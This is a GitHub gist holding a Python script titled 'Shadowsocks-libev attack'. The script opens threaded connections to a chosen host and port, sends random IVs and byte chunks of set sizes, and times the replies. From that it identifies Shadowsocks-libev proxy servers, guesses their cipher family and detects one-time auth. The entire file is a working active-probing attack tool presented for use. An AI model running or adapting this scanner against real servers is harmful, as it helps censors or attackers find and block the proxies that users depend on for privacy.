Created
July 20, 2017 08:07
-
-
Save jimages/c1d3f7a8b2e31fa65728056ff9b2d4e1 to your computer and use it in GitHub Desktop.
Shadowsocks-libev attack
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python
#-*- coding: utf-8 -*-
'''
Copyleft (c) 2016 breakwa11
https://github.com/breakwa11/shadowsocks-rss
'''
import logging | |
import socket | |
import time | |
import traceback | |
import os | |
import struct | |
import threading | |
import binascii | |
# Number of probe connections opened per scan round.
scan_first_try = 8
# NOTE(review): not referenced anywhere in the visible code.
scan_max_try = 64
# Permit count of the semaphore that bounds concurrently running probe threads.
max_thread_num = 16
def compat_ord(s):
    """Return the integer code of *s*, accepting values that are already ints.

    Indexing ``bytes`` yields an ``int`` on Python 3 but a one-character
    string on Python 2; this helper lets callers treat both the same way.
    Non-int input is delegated to the saved built-in ``_ord``.
    """
    if isinstance(s, int):
        return s
    return _ord(s)
def compat_chr(d):
    """Return the single byte with integer value *d* as a byte string.

    When ``bytes`` is ``str`` (Python 2) the saved built-in ``_chr`` already
    produces a byte string; otherwise a one-element ``bytes`` object is built.
    """
    if bytes is str:
        return _chr(d)
    return bytes([d])
# Keep handles on the real built-ins first: compat_ord / compat_chr call
# them through these private names.
_ord = ord
_chr = chr
# Shadow the built-ins at module level with the py2/py3-neutral variants.
ord = compat_ord
chr = compat_chr
def to_bytes(s):
    """Return *s* UTF-8 encoded when it is text; otherwise return it unchanged.

    The conversion only happens when ``bytes`` and ``str`` are distinct types
    (Python 3); where they are the same type the value is passed through.
    """
    if bytes is not str and isinstance(s, str):
        return s.encode('utf-8')
    return s
def to_str(s):
    """Return *s* UTF-8 decoded when it is ``bytes``; otherwise return it unchanged.

    The conversion only happens when ``bytes`` and ``str`` are distinct types
    (Python 3); where they are the same type the value is passed through.
    """
    if bytes is not str and isinstance(s, bytes):
        return s.decode('utf-8')
    return s
def random_string(length):
    """Return *length* random bytes obtained from ``os.urandom``."""
    return os.urandom(length)
def test_single(iv, ip, port, addrtype, attack_data_list, connect_timeout=5, timeout=2):
    """Run one probe connection and count how many chunks the peer silently accepts.

    Connects to ``ip:port``, sends ``iv``, then sends the entries of
    ``attack_data_list`` one at a time.  After each chunk it waits up to
    ``timeout`` seconds for a reply: a receive timeout counts the chunk as
    accepted and moves on to the next one; any data, a closed connection or
    another receive error stops the probe.

    Args:
        iv: Bytes sent first, right after connecting.
        ip: Host name or address to connect to.
        port: TCP port to connect to.
        addrtype: Unused by this function; kept for caller compatibility.
        attack_data_list: Sequence of byte strings sent in order.
        connect_timeout: Socket timeout (seconds) for connect and the IV send.
        timeout: Socket timeout (seconds) for each chunk send/receive.

    Returns:
        The number of leading chunks whose receive timed out, or ``None``
        when resolving, connecting or sending failed.
    """
    s = None
    try:
        addrs = socket.getaddrinfo(ip, port, 0, socket.SOCK_STREAM, socket.SOL_TCP)
        af, _socktype, _proto, _canonname, sa = addrs[0]
        s = socket.socket(af, socket.SOCK_STREAM)
        s.setsockopt(socket.SOL_TCP, socket.TCP_NODELAY, 1)
        s.settimeout(connect_timeout)
        s.connect(sa)
        # sendall: a short write would silently change how many bytes the
        # peer has seen, which is exactly what the probe measures.
        s.sendall(iv)
        s.settimeout(timeout)
        ok = 0
        for chunk in attack_data_list:
            s.sendall(chunk)
            try:
                s.recv(1024)
            except socket.timeout:
                # Peer is still waiting for more input: chunk accepted.
                ok += 1
                continue
            except Exception:
                # Any other receive failure ends the probe like a reply does.
                pass
            break
        return ok
    except Exception:
        # Best effort: callers treat None as "probe failed, retry".
        return None
    finally:
        # Always release the socket; the scan opens many probes.
        if s is not None:
            s.close()
class TestThread(threading.Thread):
    """Worker thread that runs one probe and records it when chunks were accepted.

    A permit is taken from ``semaphore`` in the constructor (so creating a
    thread blocks while no permit is free) and given back when ``run`` ends.

    Args:
        lock: Lock guarding ``attack_ok_list``.
        semaphore: Semaphore bounding the number of live probe threads.
        index: Identifier of this probe, stored with the result.
        attack_ok_list: Shared list that receives
            ``[index, ok, iv, addrtype, attack_data_list]`` entries.
        params: Positional arguments forwarded to ``test_single``.
    """

    def __init__(self, lock, semaphore, index, attack_ok_list, params):
        threading.Thread.__init__(self)
        self.lock = lock
        self.semaphore = semaphore
        self.index = index
        self.params = params
        self.attack_ok_list = attack_ok_list
        semaphore.acquire()

    def run(self):
        """Probe up to three times, stopping at the first attempt that does not fail."""
        try:
            for _ in range(3):
                ok = test_single(*self.params)
                if ok is None:
                    # Probe failed (connect/send error): try again.
                    continue
                if ok:
                    with self.lock:
                        self.attack_ok_list.append(
                            [self.index, ok, self.params[0], self.params[3], self.params[4]]
                        )
                break
        finally:
            # Release even on an unexpected error; the scanner waits on the
            # semaphore and would otherwise block forever.
            self.semaphore.release()
def _probe_round(addr, port, addrtype, head_len):
    """Launch ``scan_first_try`` probe threads and return their recorded results.

    Each probe sends a random 8-byte IV followed by random chunks of
    ``head_len``, 1, 4 and 4 bytes.
    """
    hits = []
    lock = threading.Lock()
    semaphore = threading.Semaphore(max_thread_num)
    for index in range(scan_first_try):
        chunks = [random_string(size) for size in (head_len, 1, 4, 4)]
        iv = random_string(8)
        TestThread(lock, semaphore, index, hits,
                   (iv, addr, port, addrtype, chunks)).start()
    print("Waiting response")
    # Each TestThread holds one permit until its run() finishes, so taking
    # every permit here blocks until all probes are done.
    for _ in range(max_thread_num):
        semaphore.acquire()
    print("attack size %d" % (len(hits),))
    return hits


def scan(addr, port):
    """Probe ``addr:port`` and report whether it answers like Shadowsocks-libev.

    Runs a round of probes with a 2-byte first chunk.  If every recorded
    probe had all four chunks accepted, a second round with a 12-byte first
    chunk is run and ``ota`` is set.  The smallest accepted-chunk count is
    turned into an IV size, and each probe with that count is replayed with
    a truncated payload; a replay with no accepted chunk confirms the guess.

    Args:
        addr: Host name or address of the server.
        port: TCP port of the server.

    Returns:
        ``True`` when a server was identified (a message is printed),
        ``False`` otherwise.
    """
    addrtype = 0
    ota = False

    hits = _probe_round(addr, port, addrtype, 2)
    if not hits:
        return False
    min_index = min(hit[1] for hit in hits)
    print("min_index %d" % (min_index,))

    if min_index == 4:
        # NOTE(review): presumably a longer header is needed when one-time
        # auth is enabled - confirm against the server implementation.
        ota = True
        hits = _probe_round(addr, port, addrtype, 12)
        if not hits:
            return False
        min_index = min(hit[1] for hit in hits)
        print("OTA min_index %d" % (min_index,))
        if min_index == 4:
            return False

    iv_size = 4 + min_index * 4
    encryptor_info = {
        16: 'rc4-md5/aes',
        8: 'chacha20/salsa20',
        12: 'chacha20-ietf',
    }
    for hit in hits:
        if hit[1] != min_index:
            continue
        iv = hit[2]
        att_data = b''.join(hit[4])
        # Replay with the payload cut to iv_size - len(iv) + 2 bytes; the
        # guess holds when the peer reacts before any receive times out.
        ok = test_single(iv, addr, port, 0, [att_data[:iv_size - len(iv) + 2]])
        if ok == 0:
            print("%s:%d is a Shadowsocks-libev server with %s encryptor, OTA = %s" % (
                addr, port, encryptor_info.get(iv_size, 'unknown'), ota))
            return True
    return False
def main(addr, port):
    """Scan ``addr:port`` and print a fallback message when nothing is identified."""
    if not scan(addr, port):
        print("%s:%d is an unknown server" % (addr, port))
if __name__ == '__main__':
    addr = "127.0.0.1"  # set the server ip or hostname
    port = 8988  # set the server port
    main(addr, port)
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment